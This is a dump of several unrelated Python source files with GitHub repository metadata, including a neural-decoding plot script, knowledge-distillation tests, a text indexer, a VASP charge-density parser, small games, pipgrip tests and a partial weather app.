'PerfFillBand', 'ShuffledPerfFillBand', 'ParamsDict',
'NumTotalTraces', 'NumCells', 'RefEventsDict']
# Initialize and open self object
my_shelf = shelve.open(SavePath)
# Iterate through the list of keys in the save list, writing each to shelf
# object
for key in VarsToSave:
# Surround write command in try/except clause to bypass possible TypeError
# issues.
try:
#my_shelf[key] = globals()[key]
my_shelf[key] = locals()[key]
except TypeError:
#
# __builtins__, my_shelf, and imported modules can not be shelved.
#
print('ERROR shelving: {0}'.format(key))
# Close shelf object after variables have been written to file
my_shelf.close()
###### End workspace save ###########
#### Begin line plot generation #####
fig1, ax1 = plt.subplots()
fig1.suptitle(FigureTitle)
## Plot decoding of observed activity-outcome correspondence ##
# Set plot color of observed trace
PlotSpecDict = {'color':'orange'}
# Label observed trace for legend
TraceLabel = 'Observed outcomes'
#
ax1.fill_between(X, PerfFillBand[0,:], PerfFillBand[1,:],
label=TraceLabel, alpha=0.7, color=PlotSpecDict['color'])
#TraceLabel = 'Mean perf.'
ax1.plot(X, PerfMeans, '.-', color=PlotSpecDict['color'])
## Plot decoding performance on activity coupled with shuffled outcomes ##
# Set plot color of shuffled trace
PlotSpecDict = {'color':'gray'}
# Label shuffled trace for legend
TraceLabel = 'Shuffled outcomes'
# Plot errorband for shuffled trace
ax1.fill_between(X, ShuffledPerfFillBand[0,:], ShuffledPerfFillBand[1,:],
label=TraceLabel, alpha=0.7, color=PlotSpecDict['color'])
# Plot shuffled trace
ax1.plot(X, ShuffledPerfMeans, '.-', color=PlotSpecDict['color'])
# Set plot axes limits and generate labels.
ax1.set_xlabel('number of cells')
ax1.set_ylabel('performance')
ax1.set_ylim([0.4, 1])
ax1.legend(loc='lower right')
####### End line plot generation ###########
####### Save figure ###########
fig1.savefig(path + os.sep + file[0:19] + '_PerfVsNumCellsIncluded.svg') | [
"rweaton@ucdavis.edu"
] | rweaton@ucdavis.edu |
edbbe884c6f756ca71cf3d3e3a28124e1c5241fb | 502fa04d0dbb81c40cd3bc748c10f04b01589500 | /src/testing.py | fec7b1f255599ec23dc05eebfbba525533eefba3 | [] | no_license | surajKrish/evolvegcn-dndf-kd | d6060b2fdd655ebce0e531153129967344efa0e8 | 87701bed8c729c1cda7a72c08a8b4878898e5862 | refs/heads/master | 2023-02-28T17:36:19.488799 | 2021-01-30T12:14:34 | 2021-01-30T12:14:34 | 334,373,229 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,521 | py | import time
import torch
import torch.optim as optim
from utils import get_memory_and_execution_time_details
from train_test_split import train_test_split
from KnowledgeDistillation import KD
from src.NeuralNetworks.GCN import GCN
from src.NeuralNetworks.RecurrentGCN import RecurrentGCN
train_loader, test_loader, num_node_features = train_test_split()
student_model = GCN(num_node_features=num_node_features, hidden_channels=[100])
lr = 10e-5
weight_decay = 5e-4
student_optimizer = optim.Adam(student_model.parameters(), lr=lr, weight_decay=weight_decay, amsgrad=True)
# Distilled EvolveGCN
epochs = 500
teacher_model_evolvegcn = RecurrentGCN(node_features=num_node_features, num_classes=2)
teacher_model_evolvegcn.load_state_dict(torch.load("./models/evolvegcn_teacher.pt"))
teacher_optimizer_evolvegcn = optim.Adam(teacher_model_evolvegcn.parameters(), lr=lr, weight_decay=weight_decay,
amsgrad=True)
student_model.load_state_dict(torch.load("./models/evolvegcn_student.pt"))
distiller_evolvegcn = KD.VanillaKD(teacher_model_evolvegcn, student_model, train_loader, test_loader,
teacher_optimizer_evolvegcn, student_optimizer)
get_memory_and_execution_time_details(distiller_evolvegcn.evaluate, True) # Evaluate the teacher network
get_memory_and_execution_time_details(distiller_evolvegcn.evaluate, False) # Evaluate the student network
distiller_evolvegcn.get_parameters()
# Distilled Deep Neural Decision Forest
from src.DeepNeuralDecisionForest import NeuralDecisionForest as ndf
epochs = 500
feat_layer = RecurrentGCN(node_features=num_node_features, num_classes=2, dropout_rate=0.65)
forest = ndf.Forest(n_tree=80, tree_depth=8, n_class=2, n_in_feature=2, tree_feature_rate=0.65)
teacher_model_dndf = ndf.NeuralDecisionForest(feat_layer, forest)
teacher_model_dndf.load_state_dict(torch.load("./models/dndf_teacher.pt"))
teacher_optimizer_dndf = optim.Adam(teacher_model_dndf.parameters(), lr=lr, weight_decay=weight_decay, amsgrad=True)
student_model.load_state_dict(torch.load("./models/dndf_student.pt"))
distiller_dndf = KD.VanillaKD(teacher_model_dndf, student_model, train_loader, test_loader,
teacher_optimizer_dndf, student_optimizer)
get_memory_and_execution_time_details(distiller_dndf.evaluate, True) # Evaluate the teacher network
get_memory_and_execution_time_details(distiller_dndf.evaluate, False) # Evaluate the student network
distiller_dndf.get_parameters()
| [
"surajKrish@users.noreply.github.com"
] | surajKrish@users.noreply.github.com |
7e94f2f379b7451b6f5601335bea880725993197 | 0c92ad9f050d8cfdcb8e405b0b13bce53ac8a304 | /line relevant/indexing_lr.py | 0966e035e70b9c2975a28594eebf7a9aabd3f081 | [] | no_license | Saurabh-Bazari/Search-Engine-Python | 36172a51d2dfcfba8fb89c1b9968301ec9ca3f7c | 57400946eb61d220285d2cccc0cc660b07d874db | refs/heads/master | 2021-04-09T17:13:06.256038 | 2019-01-08T14:21:03 | 2019-01-08T14:21:03 | 125,724,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,872 | py | import os,glob
import numpy as np
import pickle
from operator import itemgetter
import threading
def create_corpus_dict():
corpus=dict()
for filename in glob.glob(os.path.join('files','*.txt')):
filename1=filename[6:]
with open(filename) as infile:
line_number=1
for line in infile:
key = filename1 + ",line.no:"+ `line_number`
text=line.split()
corpus[key]=text
line_number=line_number+1
return corpus
def create_indexing(word,key,index):
if word in index:
if key in index[word]:
index[word][key] += 1
else:
index[word][key] = 1
else:
temp = dict()
temp[key] = 1
index[word] = temp
def calculate_average_value(table):
sum = 0
for length in table.itervalues():
sum += length
return float(sum) / float(len(table))
def f2(corpus):
pickle.dump(corpus, open('text/corpus.p', "wb"))
def f3(index):
pickle.dump(index, open('text/index.p', "wb"))
def f4(table):
pickle.dump(table, open('text/table.p', "wb"))
if __name__ == '__main__':
corpus = create_corpus_dict()
index=dict()
table=dict()
ignore_list = [ 'is' , 'are' , 'the' , 'i' , 'my' ,'' ,' ','a' , 'an']
for key in corpus:
for word in corpus[key]:
word = word.translate(None,'.,%:;/') # remove all characters like .,%:etc
word = word.strip()
word = word.lower() # convert into lower case
if word in ignore_list : # ignore words like is, are, the
continue
create_indexing(str(word), str(key),index)
length = len(corpus[str(key)])
table[key] = length
average_value = calculate_average_value(table)
pickle.dump(average_value, open('text/average_value.p', "wb"))
t1 = threading.Thread(target=f2, args=(corpus,))
t1.start()
t2 = threading.Thread(target=f3, args=(index,))
t2.start()
t3 = threading.Thread(target=f4, args=(table,))
t3.start()
t1.join()
t2.join()
t3.join() | [
"saurabhbazari3101@gmail.com"
] | saurabhbazari3101@gmail.com |
04283c4f03a5d95a9bc868d1323896986783c79c | b3e7bc43b177ed9dc46fa5ba8fa11bc821ff845c | /pykit/chargedensity/vasp.py | 8c0766a6a5718a8baabba12d49ca14d304512175 | [] | no_license | gjenness/Pykit | 893ce12b91c36fbdde6868bfda08867def610be0 | fd29d8d74248d9993b5240d7eb1382c967224fa8 | refs/heads/master | 2021-01-10T21:04:52.537387 | 2013-01-11T22:57:47 | 2013-01-11T22:57:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,617 | py | import os, math, time, itertools
import numpy as np
from pykit.chargedensity.chargedensity import ChargeDensity
from pykit.geometry import geomread
class Chgcar(ChargeDensity):
def __init__(self, chgfile='CHGCAR', posfile='POSCAR', status='r'):
ChargeDensity.__init__(self, chgfile=chgfile, status=status)
pos = geomread(posfile)
self.atomlist = pos.get_atom_list()
self.coordinates = pos.get_positions()
def read_chgfile(self):
f = open(self.chgfile, 'r')
contents = f.readlines()
f.close()
# Get the lattice parameter and lattice vectors
self.lattice = float(contents[1])
for i in range(3):
for j in range(3):
self.latticevec[i, j] = float(contents[i+2].split()[j])
self.typelist = np.array(contents[5].split(), int)
ntypes = len(self.typelist)
for a in self.typelist:
self.natoms += a
# Just read in the coordinates, DO NOT save them!
coordinates = np.zeros((self.natoms, 3))
for i in range(self.natoms):
for j in range(3):
coordinates[i,j] = float(contents[i+7].split()[j])
for i in range(3):
self.gridpoints[i] = int(contents[8+self.natoms].split()[i])
ngrid = 1
for i in range(3):
ngrid *= int(self.gridpoints[i])
# Augmentation charges start at (gridpoints/5 + self.natoms + 9)
# Since we don't need those (they're only related to PAW psp's), we will not even bother with them
ngx = int(self.gridpoints[0])
ngy = int(self.gridpoints[1])
ngz = int(self.gridpoints[2])
self.chgden = np.zeros((ngx, ngy, ngz))
tmp = open('tmp', 'w')
for con in contents[(self.natoms+9): -1]:
tmp.write(con)
tmp.write(contents[-1])
tmp.close()
f2 = open('tmp', 'r')
for zz in range(ngz):
for yy in range(ngy):
self.chgden[:, yy, zz] = np.fromfile(f2, dtype=float, count=ngx, sep=' ')
f2.close()
contents = None # Clear out the variable contents
def write_chgfile(self, name):
f = open(name, 'w')
f.write('unknown system\n')
f.write('%10.5f\n' % self.lattice)
for i in range(3):
for j in range(3):
f.write('%13.6f' % self.latticevec[i,j])
f.write('\n')
unique_atoms = list()
for list_, count in itertools.groupby(self.atomlist):
number = 0
for c in count:
number += 1
unique_atoms.append([list_, number])
natoms = 0
for atom in unique_atoms:
f.write('%5i' % (atom[1]))
natoms += atom[1]
f.write('\nDirect\n')
for i in range(natoms):
for j in range(3):
f.write('%12.6f' % self.coordinates[i,j])
f.write('\n')
f.write('\n')
for i in range(3):
f.write('%5i' % self.gridpoints[i])
f.write('\n')
ngrid = int(self.gridpoints[0]*self.gridpoints[1]*self.gridpoints[2])
ngx = int(self.gridpoints[0])
ngy = int(self.gridpoints[1])
ngz = int(self.gridpoints[2])
count = 0
for zz in range(ngz):
for yy in range(ngy):
for xx in range(ngx):
count += 1
f.write('%22.11e' % self.chgden[xx, yy, zz])
if (count % 5 == 0):
f.write('\n')
f.close()
# print 'CHGCAR file', name, 'successfully written.\n'
| [
"glen@glen-VirtualBox.(none)"
] | glen@glen-VirtualBox.(none) |
4db18047d418f05886f0867b18a5287ce69aef4e | 7c5a2dcd8dbde425f0d224c29ddf2589df5f6e95 | /rock paper scisosooros.py | ef86509736e048d9189e330f5de68d7715af0d52 | [] | no_license | s0Iitaire/idk-fam | 6a63af6043ea58e672941d209b4f4bdae4edbfc4 | 683ea99d3bb2adbb450e0729f0048a50da31e30d | refs/heads/main | 2023-03-29T04:07:07.481486 | 2021-03-28T22:43:41 | 2021-03-28T22:43:41 | 352,451,463 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 863 | py | # imports random function
import random
# creates da while loop
game=True
while game == True:
usersSelect = int(input("choose one of these options:\n 1 = Rock \n 2 = Paper \n 3 = Scissors\n"))
computerSelect = random.randint(1,3)
if computerSelect == 1:
print("computer chose Rock")
elif computerSelect == 2:
print("computer chose Paper")
else:
print("computer chose scissors")
if usersSelect == computerSelect:
print("it'z a draw!")
elif usersSelect == 1 and computerSelect == 3:
print("you win!")
elif usersSelect == 2 and computerSelect == 1:
print("you win!")
elif usersSelect == 3 and computerSelect == 2:
print("you win!")
else:
print("computer wins!")
text = input("play again?")
if text=="Y":
game=False
| [
"noreply@github.com"
] | s0Iitaire.noreply@github.com |
d1d8b0f0745d0cbadc0870e6c03600d69579d87f | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/coins_20200607123443.py | 742c4c7e6e1d456cb4ac4cfeb1fabd621a8f9488 | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 115 | py |
def change(amount,coins):
count = 0
for i in range(len(coins)):
if mount
change(5,[1,2,5])
| [
"mary.jereh@gmail.com"
] | mary.jereh@gmail.com |
e3216a059768b75953a953db9bd77fd8b723a848 | d593d4f75aefa78f63c15ec94c4364d2e5f5aa1d | /advisor/is_direct_logic/static/test_offer_open_email_with_offer_click_and_browse_cbtt_08.py | 7ba398dd025836229152e928ce801cec8b672f6c | [] | no_license | rpheart/pycharmTmcautomation | 16549f18d9bb8dd88b55f7f653cafbbcd3819c78 | 9682c02b0984e09078d3a7cdf3bdaaf365ae3108 | refs/heads/master | 2020-03-25T14:01:58.600105 | 2018-03-06T12:02:33 | 2018-03-06T12:02:33 | 143,852,753 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,602 | py | import os
import unittest
from random import randint
import requests
import advisor.is_direct_logic.utils as utils
import advisor.utils.api_calls as api
import advisor.utils.env_config as settings
import advisor.utils.tcpdump as tcp
# Globals
unique_key = randint(1000, 10000)
email = "TC08_%s@advisortest.com" % unique_key
cookie_id = "88888_%s" % unique_key
cbtt = None
sku = "123"
filtered_response = []
# environment variables
env = os.environ["BUILD_ENV"]
advisor = settings.api_settings[env]["advisor"]
renderer = settings.api_settings[env]["renderer"]
click = settings.api_settings[env]["clickback"]
guid = settings.client_settings[env]["guid"]
aid = settings.client_settings[env]["aid"]
username = settings.client_settings[env]["username"]
password = settings.client_settings[env]["password"]
tcp_username = settings.kafka_settings[env]["tcp_username"]
tcp_server = settings.kafka_settings[env]["tcp_server"]
tcp_key = settings.kafka_settings[env]["tcp_key"]
if env == "QA":
engagement = "13223"
elif env == "PREPROD":
engagement = "6884"
def send_requests():
request_list = [
api.offer_open(renderer, guid, engagement, email=email),
api.offer_click(click, guid, engagement, email=email)
]
for request in request_list:
response = requests.get(request)
if not response.raise_for_status():
if "cbtt=" in response.url:
nonsense, cbtt = response.url.split("cbtt=")
request_list_cbtt = [
api.browse(advisor, username, password, aid, sku, cookie_id=cookie_id, cbtt=cbtt),
api.cart_add(advisor, username, password, aid, sku, cookie_id=cookie_id),
api.buy(advisor, username, password, aid, sku, cookie_id=cookie_id)
]
for request in request_list_cbtt:
requests.get(request).raise_for_status()
class TestOfferOpenEmailWithOfferClickAndBrowseCbtt(unittest.TestCase):
@classmethod
def setUpClass(cls):
send_requests()
response = tcp.fetch_tcpdump(tcp_server, tcp_username, tcp_key)
for line in tcp.filter_tcpdump(response):
if str(unique_key) in line:
filtered_response.append(line)
def test_is_direct_is_true(self):
self.assertTrue(utils.verify_is_direct(filtered_response),
msg="is direct logic should be true but is: %s" % str(
utils.verify_is_direct(filtered_response)))
def test_offer_open_contains_all_event_information(self):
self.assertTrue(utils.verify_json_contains_events(filtered_response[0]),
msg="offer open event is missing this campaign information")
def test_offer_click_contains_all_event_information(self):
self.assertTrue(utils.verify_json_contains_events(filtered_response[1]),
msg="offer click event is missing this campaign information")
def test_browse_contains_all_event_information(self):
self.assertTrue(utils.verify_json_contains_events(filtered_response[2]),
msg="browse event is missing this campaign information")
def test_cart_add_contains_all_event_information(self):
self.assertTrue(utils.verify_json_contains_events(filtered_response[3]),
msg="cart add event is missing this campaign information")
def test_buy_contains_all_event_information(self):
self.assertTrue(utils.verify_json_contains_events(filtered_response[4]),
msg="buy event is missing this campaign information")
if __name__ == "__main__":
unittest.main()
| [
"patrick.summers@smartfocus.com"
] | patrick.summers@smartfocus.com |
b1bd78b498674dcbdece7b2c8afec187d4fa30ef | 119dece27950b3eec7f85c8e4594acb76a08579f | /python/test_evaluate.py | a204ae29aff40f18dfd527edc5e3e9397e742668 | [] | no_license | seanorar/Memoria | 871f981ce5a231de239004cc1c677d7ec507e63e | 612bcf451ae81a1e87518ea4271da9706ec7c87e | refs/heads/master | 2021-01-20T10:53:39.939727 | 2018-01-02T13:56:11 | 2018-01-02T13:56:11 | 97,170,716 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,989 | py | from evaluate import *
#prototxt_i = "/home/sormeno/py-faster-rcnn/models/imagenet/VGG16/faster_rcnn_end2end/test.prototxt"
#caffemodel_i = "/home/sormeno/py-faster-rcnn/data/faster_rcnn_models/VGG16_faster_rcnn_imagenet.caffemodel"
prototxt_i = "/home/sormeno/Desktop/ZF_ILSVRC.prototxt"
caffemodel_i = "/home/sormeno/Desktop/ZF_ILSVRC_170W_600_31_0.v2.caffemodel"
prototxt_p = "/home/sormeno/py-faster-rcnn/models/pascal_voc/VGG16/faster_rcnn_end2end/test.prototxt"
caffemodel_p = "/home/sormeno/py-faster-rcnn/data/faster_rcnn_models/VGG16_faster_rcnn_final.caffemodel"
#imagenet
#-------------------------------------------------------------------------
"""
txt_data = "/home/sormeno/Datasets/Imagenet/ILSVRC13/data/det_lists/val.txt"
path_imgs = "/home/sormeno/Datasets/Imagenet/ILSVRC13/ILSVRC2013_DET_val/"
path_xmls = "/home/sormeno/Datasets/Imagenet/ILSVRC13/ILSVRC2013_DET_bbox_val/"
data_to_graphs(txt_data, path_imgs, path_xmls, prototxt_p, caffemodel_p, "gpu", "/home/sormeno/imagenet_pascal")
data_to_graphs(txt_data, path_imgs, path_xmls, prototxt_i, caffemodel_i, "gpu", "/home/sormeno/imagenet_imagenet")
"""
#pascal
#---------------------------------------------------------------------------
"""
txt_data = "/home/sormeno/Datasets/Pascal/val.txt"
path_imgs = "/home/sormeno/Datasets/Pascal/Images/"
path_xmls = "/home/sormeno/Datasets/Pascal/xmls/"
data_to_graphs(txt_data, path_imgs, path_xmls, prototxt_p, caffemodel_p, "gpu", "/home/sormeno/pascal_pascal")
data_to_graphs(txt_data, path_imgs, path_xmls, prototxt_i, caffemodel_i, "gpu", "/home/sormeno/pascal_imagenet")
"""
#dataset
#---------------------------------------------------------------------------
"""
txt_data = "/home/sormeno/Desktop/videos/1/val.txt"
path_imgs = "/home/sormeno/Desktop/videos/1/shots/"
path_xmls = "/home/sormeno/Desktop/videos/1/bbox_data.txt"
data_to_graphs(txt_data, path_imgs, path_xmls, prototxt_p, caffemodel_p, "gpu", "/home/sormeno/mdata_pascal_1")
data_to_graphs(txt_data, path_imgs, path_xmls, prototxt_i, caffemodel_i, "gpu", "/home/sormeno/mdata_imagenet_1")
"""
plot_data_vs_trsh("mdata",6)
plot_presicion_vs_recall("mdata",6)
"""
prototxt = "/home/sebastian/Escritorio/data_app/test_pascal.prototxt"
caffemodel = "/home/sebastian/Escritorio/data_app/VGG16_faster_rcnn_final.caffemodel"
path_img = "/home/sebastian/Escritorio/universidad/memoria/py-faster-rcnn/tools/videos/1/to_proces/12.jpg"
path_xml = "/home/sebastian/Escritorio/ILSVRC2012_val_00000001.xml"
path_txt = "/home/sebastian/Escritorio/universidad/memoria/py-faster-rcnn/tools/videos/1/bbox_detected.txt"
gt = get_bbox_from_txt(path_txt, "12")
net = init_net(prototxt, caffemodel, "cpu")
predicted = get_img_bbox2(path_img, net)
img = cv2.imread(path_img)
show_best_roi(img,gt, predicted)
"""
#bbox_val_imagenet("/home/sormeno/Datasets/Imagenet/ILSVRC2014_devkit/data/det_lists/", "/home/sormeno/Datasets/Imagenet/ILSVRC2013_DET_bbox_val/", "/home/sormeno/Datasets/Imagenet/ILSVRC2013_DET_val/") | [
"seba_orme@hotmail.com"
] | seba_orme@hotmail.com |
0e856ffc51a9a1c7e642398621d9fc3c81414ff0 | d0d46725767ac4399ca3df883a32038a21fdca90 | /decision_tree/split_by_entropy.py | 4bad3f919f896ac71f9fe069c886a7350922931a | [] | no_license | andvoidlei/algorithm-python | 23e3d87342c3ea8f00c961a30af0dbc43a11418f | ee645a4a3b82231c0c33b2c29c82ac980363463c | refs/heads/master | 2021-06-26T19:56:17.316891 | 2020-10-20T12:53:15 | 2020-10-20T12:53:15 | 138,046,280 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,006 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 4 13:35:15 2018
@author: Administrator
"""
from cal_entropy import *
def Split_Data(dataset, axis, value):
'''
使用传入的axis以及value划分数据集
axis代表在每个列表中的第X位,value为用来划分的特征值
输出非axis特征值及结果
'''
new_subset = []
# 利用循环将不符合value的特征值划分入另一集合
# 相当于将value单独提取出来(或作为叶节点)
for vec in dataset:
if vec[axis] == value:
feature_split = vec[:axis]
print(vec[:axis])
feature_split.extend(vec[axis + 1:])
new_subset.append(feature_split)
# extend将VEC中的元素一一纳入feature_split
# append则将feature_split作为列表结合进目标集合
return new_subset
def Split_by_entropy(dataset):
'''
使用熵原则进行数据集划分
@信息增益:info_gain = old -new
@最优特征:best_feature
@类别集合:uniVal
'''
feature_num = len(dataset[0]) - 1
ent_old = cal_entropy(dataset)
best_gain = 0.0
best_feature = -1
# ENT_OLD代表划分前集合的熵,ENT_NEW代表划分后的熵
# best_gain将在迭代每一次特征的时候更新,最终选出最优特征
for i in range(feature_num):
feature_list = [x[i] for x in dataset]
uniVal = set(feature_list)
ent_new = 0.0
# 使用set剔除重复项,保留该特征对应的不同取值
for value in uniVal:
sub_set = Split_Data(dataset, i, value)
prob = len(sub_set) / float(len(dataset))
# 使用熵计算函数求出划分后的熵值
ent_new += prob * (0 - cal_entropy(sub_set))
# 由ent_old - ent_new选出划分对应的最优特征
Info_gain = ent_old - ent_new
if (Info_gain > best_gain):
best_gain = Info_gain
best_feature = i
return best_feature | [
"andvoid_lei@163.com"
] | andvoid_lei@163.com |
7a07505f57ca38099f4fd05c34e0ed4651f5cad6 | f521bf0937dddcc022b1bad179831a03b7e59318 | /tests/test_pipper.py | 8dce678876259b4d8c262cd351bfa0fff64c2d5b | [
"BSD-3-Clause"
] | permissive | jdvala/pipgrip | 243664e3dde58c7897901c0b8c1d4cb3cfde75db | 84a766dca193e8df45a2d45ac3fa4cda219fbcac | refs/heads/master | 2022-11-30T18:59:17.054091 | 2020-08-07T08:58:34 | 2020-08-07T08:58:34 | 295,218,451 | 1 | 0 | BSD-3-Clause | 2020-09-13T19:04:27 | 2020-09-13T19:04:26 | null | UTF-8 | Python | false | false | 6,747 | py | import os
import subprocess
import pytest
import pipgrip.pipper
from pipgrip.pipper import _download_wheel, _get_available_versions
@pytest.mark.parametrize(
"package, pip_output, expected",
[
(
".[all]",
"""
Collecting jupyterlab-black
Downloading https://files.pythonhosted.org/packages/b3/c9/b3d38a0cc2a5237becb3c2f8843ca5a8e884906e9018029e4c4e5c43f62e/jupyterlab_black-0.2.1.tar.gz
Building wheels for collected packages: jupyterlab-black
Running setup.py bdist_wheel for jupyterlab-black: started
Running setup.py bdist_wheel for jupyterlab-black: finished with status 'done'
Stored in directory: ~/Library/Caches/pip/wheels/pipgrip
Successfully built jupyterlab-black
""",
"a.whl",
),
(
"six",
"""
Collecting six
Downloading https://files.pythonhosted.org/packages/ee/ff/48bde5c0f013094d729fe4b0316ba2a24774b3ff1c52d924a8a4cb04078a/six-1.15.0-py2.py3-none-any.whl
Saved ~/Library/Caches/pip/wheels/pipgrip/six-1.15.0-py2.py3-none-any.whl
Skipping six, due to already being wheel.
""",
"six-1.15.0-py2.py3-none-any.whl",
),
(
"jupyterlab-black",
"""
Collecting jupyterlab-black
Downloading https://files.pythonhosted.org/packages/b3/c9/b3d38a0cc2a5237becb3c2f8843ca5a8e884906e9018029e4c4e5c43f62e/jupyterlab_black-0.2.1.tar.gz
Building wheels for collected packages: jupyterlab-black
Running setup.py bdist_wheel for jupyterlab-black: started
Running setup.py bdist_wheel for jupyterlab-black: finished with status 'done'
Stored in directory: ~/Library/Caches/pip/wheels/pipgrip
Successfully built jupyterlab-black
""",
"jupyterlab_black-0.2.1-py3-none-any.whl",
),
(
"six",
"""
Collecting six
File was already downloaded ~/Library/Caches/pip/wheels/pipgrip/six-1.15.0-py2.py3-none-any.whl
Skipping six, due to already being wheel.
""",
"six-1.15.0-py2.py3-none-any.whl",
),
(
"six",
"""
Collecting six
Using cached six-1.15.0-py2.py3-none-any.whl (10 kB)
Saved ~/Library/Caches/pip/wheels/pipgrip/six-1.15.0-py2.py3-none-any.whl
Skipping six, due to already being wheel.
""",
"six-1.15.0-py2.py3-none-any.whl",
),
(
"six",
"""
Collecting six
Downloading six-1.15.0-py2.py3-none-any.whl (10 kB)
Saved ~/Library/Caches/pip/wheels/pipgrip/six-1.15.0-py2.py3-none-any.whl
Skipping six, due to already being wheel.
""",
"six-1.15.0-py2.py3-none-any.whl",
),
(
"jupyterlab-black",
"""
Collecting jupyterlab-black
Downloading jupyterlab_black-0.2.1.tar.gz (3.1 kB)
Building wheels for collected packages: jupyterlab-black
Building wheel for jupyterlab-black (setup.py): started
Building wheel for jupyterlab-black (setup.py): finished with status 'done'
Created wheel for jupyterlab-black: filename=jupyterlab_black-0.2.1-py3-none-any.whl size=2497 sha256=2d21a5420b39156f7e55da105b8a064889674ae8a1a09f3fd2884c78a994a851
Stored in directory: ~/Library/Caches/pip/wheels/83/ba/78/469d847858dff4d2e600bff2de9d09bf455bb5be3ffb566af1
Successfully built jupyterlab-black
""",
"jupyterlab_black-0.2.1-py3-none-any.whl",
),
(
"Keras",
"""
Collecting Keras
Using cached https://files.pythonhosted.org/packages/6b/09/756db7ae3dd2ec804963e21db8250ffe347aaba6f6d13d6c0ed833d85109/Keras-2.4.3-py2.py3-none-any.whl
Saved ~/library/caches/pip/wheels/pipgrip/Keras-2.4.3-py2.py3-none-any.whl
""",
"Keras-2.4.3-py2.py3-none-any.whl",
),
],
ids=(
"pip10 .",
"pip10 fetched 1",
"pip10 built 1",
"pip>10 cached 1",
"pip>10 cached 2",
"pip>10 fetched 2",
"pip>10 built 1",
"Windows lowercase cache_dir",
),
)
def test_download_wheel(package, pip_output, expected, monkeypatch):
cache_dir = "~/Library/Caches/pip/wheels/pipgrip"
def patch_os_walk(*args, **kwargs):
yield cache_dir, None, [
"a.whl",
"jupyterlab_black-0.2.1-py3-none-any.whl",
"x.whl",
]
def patch_getmtime(*args, **kwargs):
return 0
def patch_pip_output(*args, **kwargs):
return pip_output
monkeypatch.setattr(
pipgrip.pipper.os, "walk", patch_os_walk,
)
monkeypatch.setattr(
pipgrip.pipper.os.path, "getmtime", patch_getmtime,
)
monkeypatch.setattr(
pipgrip.pipper, "stream_bash_command", patch_pip_output,
)
assert _download_wheel(
package, "https://pypi.org/simple", "https://pypi.org/simple", False, cache_dir,
) == os.path.join(cache_dir, expected.lstrip(os.path.sep))
@pytest.mark.parametrize(
"package, pre, pip_output, expected",
[
(
"click",
True,
"""
Collecting click==rubbish
Could not find a version that satisfies the requirement click==rubbish (from versions: 6.6, 6.7.dev0, 6.7, 7.0, 7.1, 7.1.1, 7.1.2)
No matching distribution found for click==rubbish
""",
["6.6", "6.7.dev0", "6.7", "7.0", "7.1", "7.1.1", "7.1.2"],
),
(
"click",
False,
"""
Collecting click==rubbish
Could not find a version that satisfies the requirement click==rubbish (from versions: 6.6, 6.7.dev0, 6.7, 7.0, 7.1, 7.1.1, 7.1.2)
No matching distribution found for click==rubbish
""",
["6.6", "6.7", "7.0", "7.1", "7.1.1", "7.1.2"],
),
],
ids=("click pre", "click"),
)
def test_get_available_versions(package, pre, pip_output, expected, monkeypatch):
def patch_pip_output(*args, **kwargs):
raise subprocess.CalledProcessError(returncode=1, cmd="", output=pip_output)
monkeypatch.setattr(
pipgrip.pipper, "stream_bash_command", patch_pip_output,
)
assert (
_get_available_versions(package, "https://pypi.org/simple", None, pre)
== expected
)
| [
"noreply@github.com"
] | jdvala.noreply@github.com |
3b3322f1e95944bd832f02cd426aaf751b7b9e2d | 09175fc0e91d9acf794dde9b7ac9818fb484f610 | /images/folder_util.py | f1b744dabc3d343ca7e06829c5257f1a20ad5677 | [] | no_license | dyeden/mapbiomas-utils | 612ae1bce148da000376bcda6150cf70a0d6cdc6 | 89bad2a81a96075e6f8850dbf253a6cfef163196 | refs/heads/master | 2020-05-02T15:51:04.052593 | 2019-05-05T22:07:37 | 2019-05-05T22:07:37 | 178,053,811 | 1 | 0 | null | 2019-05-05T22:07:38 | 2019-03-27T18:36:06 | Python | UTF-8 | Python | false | false | 393 | py | """
mkdir -p /mnt/disks/data/data2/collections/COLECAO3_1/INTEGRACAO
mkdir -p /mnt/disks/data/data2/collections/COLECAO3_1/RGB
mkdir -p /mnt/disks/data/data2/collections/COLECAO3_1/TRANSICAO
mkdir -p /mnt/disks/data/data2/collections/COLECAO3_1/VRT/INTEGRACAO
mkdir -p /mnt/disks/data/data2/collections/COLECAO3_1/VRT/RGB
mkdir -p /mnt/disks/data/data2/collections/COLECAO3_1/VRT/TRANSICAO
""" | [
"dyeden.monteiro@terras.agr.br"
] | dyeden.monteiro@terras.agr.br |
9f221f4aed7b605b04d8d8aa9a732b2c4c612faf | 4e83f4c3fdba728d6d888d9077f47f5a87a8858e | /weather.py | 896ea14d1a398b5ff6fdb1484021af46ac63698e | [
"Apache-2.0"
] | permissive | Gagan-nmims/Weather_Forecast | c66cee57cce0b7e4e9a05959ca574ed5e735e8ba | 1cafeebeec0f6398f8e9da05bc5f679175b158f9 | refs/heads/main | 2023-06-09T04:33:04.494536 | 2021-06-26T08:25:12 | 2021-06-26T08:25:12 | 380,451,286 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,641 | py | # import all functions from the tkinter
from tkinter import *
# function to find weather details
# of any city using openweathermap api
def tell_weather() :
# import required modules
import requests, json
# enter your api key here
api_key = "bec52956c57b0d87d77cfc1390bb2458"
# base_url variable to store url
base_url = "http://api.openweathermap.org/data/2.5/weather?"
# take a city name from city_field entry box
city_name = city_field.get()
# complete_url variable to store complete url address
complete_url = (base_url + "appid=" + api_key + "&q=" + city_name)
# get method of requests module
# return response object
response = requests.get(complete_url)
# json method of response object convert
# json format data into python format data
x = response.json()
# now x contains list of nested dictionaries
# we know dictionary contains key value pair
# check the value of "cod" key is equal to "404"
# or not if not that means city is found
# otherwise city is not found
if x["cod"] != "404" :
